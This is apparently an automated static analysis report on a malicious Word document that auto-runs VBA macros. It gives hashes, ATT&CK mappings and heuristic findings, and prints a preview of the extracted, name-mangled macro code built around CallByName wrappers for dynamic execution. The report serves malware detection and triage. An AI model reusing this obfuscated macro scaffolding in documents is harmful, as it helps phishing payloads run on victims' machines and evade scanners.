Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3a978d66e095b959…

MALICIOUS

Office (OLE)

Size: 82.5 KB
Created: 2016-05-12 23:30:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 4fe5ff9f3237f24f6d6c053952fbae15
SHA-1: 30605f77b70d5892cd22828fb1be204d5c513956
SHA-256: 3a978d66e095b9593a72c67c263fe104950393c3db6db5725f0715b5854d2a4b
Risk score: 144

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an Office document with detected VBA macros. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicates that the macro is designed to execute automatically upon opening the document, likely by using 'CreateObject' to launch a malicious payload. The presence of 'CallByName' calls further suggests dynamic execution of code.

Heuristics (6)

  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Matched lines in script:
    Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
    CallByName xoqaDLo, qwJny, 1
    End Sub
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download, or object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where no visible macro source is available.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The URLs listed here are the standard XML namespace identifiers for RDF, XMP and DrawingML metadata, not network indicators.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1740 bytes
SHA-256: bd71e932ea238920aed8a831826d949264f1ec272a2ea065705c49afbc02b7f3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
39 of 61 identifiers look randomly generated (e.g. 'FnNC3zJ5JxoN2U'), which is consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "SiovGt"
Private Sub ClDEAxxw(ByVal IMxuPR As Boolean, ByVal UBQIToI As Integer)
QzYClH "FnNC3zJ5JxoN2U", 8941, "rCG482M5g"
End Sub
Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
CallByName xoqaDLo, qwJny, 1
End Sub
Public Sub uLMdQEzSM(ByVal EHhZvkvY As Variant, ByVal sZbhA As String, ByVal nQJGcyJuxH As Variant, ByVal loEiPnFEA As Object, ByVal quuPFeRPwX As Variant)
IXNhTW = "l2VZR9nD2"
CallByName loEiPnFEA, sZbhA, 1, EHhZvkvY, nQJGcyJuxH, quuPFeRPwX
End Sub
Public Function kHJDvJ(ByVal nYiINdSYPo As String, ByVal QimeyGm As Object, ByVal kKdMPKx As String) As Variant
Dim VmKBS As Integer, bAmMXC As Integer
Set kHJDvJ = CallByName(QimeyGm, nYiINdSYPo, 2, kKdMPKx)
End Function
Public Sub QavSmHwAdE(ByVal kXMXvgXM As Variant, ByVal UihLPcbp As String, ByVal LbRDnPIz As Integer, ByVal zwuHQkbdv As Variant, ByVal AvKZEdLCKg As String, ByVal ZdFxP As Object)
CallByName ZdFxP, UihLPcbp, 1, kXMXvgXM, zwuHQkbdv
End Sub
Public Sub HQvScqTefi(ByVal OnIWlzab As Boolean, ByVal Jmipofj As Variant, ByVal bNiRsuvF As Object, ByVal jXGWtA As String)
CallByName bNiRsuvF, jXGWtA, 4, Jmipofj
End Sub
Private Sub jIAMbLT(ByVal AEwBfCTeA As Integer, ByVal vOPGfq As Integer)
VYZRTX "PMlVAnnZYb"
FaPULoVT 5592, "iL2G7ATQq9s", "6nCQR9WtSsb"
End Sub
Public Sub lITquzHn(ByVal NIuVH As String, ByVal DGnrbz As Object, ByVal ltxCfvQYK As Integer, ByVal MWKWM As Variant, ByVal vvSEm As String)
CallByName DGnrbz, vvSEm, 1, MWKWM
End Sub
Public Function JvWgrglen(ByVal xfQxkqo As String, ByVal afGcAxt As String, ByVal dJYFud As Object) As Variant
Dim FzqRXM As Integer, UNYDxtaaT As Boolean
JvWgrglen = CallByName(dJYFud, afGcAxt, 2)
End Function